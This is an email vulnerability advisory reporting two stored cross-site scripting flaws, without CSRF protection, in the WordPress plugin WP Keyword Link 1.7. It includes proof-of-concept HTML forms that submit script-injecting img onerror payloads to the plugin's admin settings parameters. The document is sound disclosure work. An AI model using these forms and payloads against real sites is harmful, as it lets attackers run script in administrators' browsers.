Subject: Persistent Cross-Site Scripting (XSS) in WP Keyword Link 1.7

Date: Mon, 24 Aug 2015 11:26:07 +0200

Hello,

Plugin: WP Keyword Link 1.7 https://wordpress.org/plugins/rejected-wp-keyword-link-rejected/

1. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/options-general.php?page=rejected-wp-keyword-link-rejected%2Fwp_keywordlink.php

Vulnerable parameters: limit

Example PHP callstack:

wp_options_page [/rejected-wp-keyword-link-rejected/wp_similarity.php:483]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=rejected-wp-keyword-link-rejected%2Fwp_keywordlink.php" />

<input type="text" name="update_options" value="1" />

<input type="text" name="limit" value='"><img src=x onerror=alert(1) />'>

<input type="submit" />

</form>

--

2. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/options-general.php?page=rejected-wp-keyword-link-rejected%2Fwp_keywordlink.php

Vulnerable parameters: match_num_from, match_num_to

Example PHP callstack:

wp_keywordlink_global_options [/rejected-wp-keyword-link-rejected/wp_keywordlink.php:360]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=rejected-wp-keyword-link-rejected%2Fwp_keywordlink.php" />

<input type="text" name="action" value="global_options" />

<input type="text" name="match_num_from" value='"><img src=x onerror=alert(1) />'>

<input type="text" name="match_num_to" value='"><img src=x onerror=alert(2) />'>

<input type="submit" />

</form>

--

--

Regards,
Marcin Probola,